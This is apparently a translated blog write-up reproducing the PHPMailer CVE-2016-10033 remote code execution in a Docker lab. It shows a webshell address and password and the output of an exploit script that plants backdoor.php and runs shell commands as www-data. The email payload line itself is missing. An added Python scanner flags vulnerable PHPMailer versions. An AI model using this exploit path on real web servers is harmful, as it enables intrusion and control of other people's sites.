PHPMailer remote command execution vulnerability reproduction
I. Vulnerability overview
PHPMailer is a PHP class for creating and sending email, used by many open source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and so on.
PHPMailer < 5.2.18 has a security vulnerability that allows an unauthenticated remote attacker to execute arbitrary code in the context of the web server user and so remotely control the target web application.
II. Affected versions:
PHPMailer < 5.2.18
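To find bundled PHPMailer copies that fall in this range, the following added example (not part of the original article) walks a web root and compares each declared version with 5.2.18. It assumes the PHPMailer 5.x layout, where class.phpmailer.php declares `public $Version = '...';`; the function names and the sample tree built in `demo()` are constructed for illustration.

```python
import re
import sys
import tempfile
from pathlib import Path

FIXED = (5, 2, 18)  # first release outside the affected range stated above
# Assumed PHPMailer 5.x declaration: public $Version = '5.2.17';
VERSION_RE = re.compile(r"""\$Version\s*=\s*['"](\d+(?:\.\d+)*)""")


def parse_version(text):
    """Return the declared version as a tuple of ints, or None if absent."""
    m = VERSION_RE.search(text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def is_affected(version):
    """True when version < 5.2.18; short versions are padded (5.2 -> 5.2.0)."""
    padded = tuple(version) + (0,) * (len(FIXED) - len(version))
    return padded < FIXED


def scan(root):
    """Yield (path, version, affected) for every bundled PHPMailer class file."""
    for path in sorted(Path(root).rglob("class.phpmailer.php")):
        version = parse_version(path.read_text(errors="replace"))
        # An unreadable version is reported as affected so it gets reviewed.
        yield str(path), version, version is None or is_affected(version)


def demo():
    """Scan a constructed tree holding one old and one fixed copy."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, ver in (("old", "5.2.17"), ("new", "5.2.18")):
            d = Path(tmp, name, "phpmailer")
            d.mkdir(parents=True)
            d.joinpath("class.phpmailer.php").write_text(
                "<?php\nclass PHPMailer {\n    public $Version = '%s';\n}\n" % ver)
        return [(Path(p).parts[-3], v, a) for p, v, a in scan(tmp)]


if __name__ == "__main__":
    rows = scan(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for path, version, affected in rows:
        shown = ".".join(map(str, version)) if version else "unknown"
        print(f"{'AFFECTED' if affected else 'ok':8}  {shown:10}  {path}")
```

Run it with a web root as the only argument to list every copy found; with no argument it scans the constructed sample tree.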
III. Vulnerability reproduction
Docker environment:
docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033
Once the image has been pulled and the container has started, the environment is available at:
http://192.168.1.107:8080/
At http://192.168.1.107:8080/, enter any value such as “aaa” in the name field, and in the email field enter:
This uploads a one-line webshell. The page takes 3-5 minutes to respond, so expect a long wait.
Webshell address: http://192.168.1.107:8080/a.php password: thelostworld
Virtual terminal:
Using the script:
To obtain the script, reply “PHPMailer” in the public account backend.
➜ Desktop ./exploits.sh 192.168.1.107:8080
[+] exploit by opsxcq CVE-2016-10033
[+] Exploiting 192.168.1.107:8080
[+] Target exploited, Acessing shell at http://192.168.1.107:8080/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell> [+] Running
RemoteShell> id
[+] Running id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Access the backdoor address:
http://192.168.1.107:8080/backdoor.php
Disclaimer: The security tools and procedures (methods) provided by this site may be offensive in nature and are intended only for security research and teaching; use them at your own risk.
Disclaimer: Copyright belongs to the author. For commercial reprints, please contact the author for authorization; for non-commercial reprints, please indicate the source.
thelostworld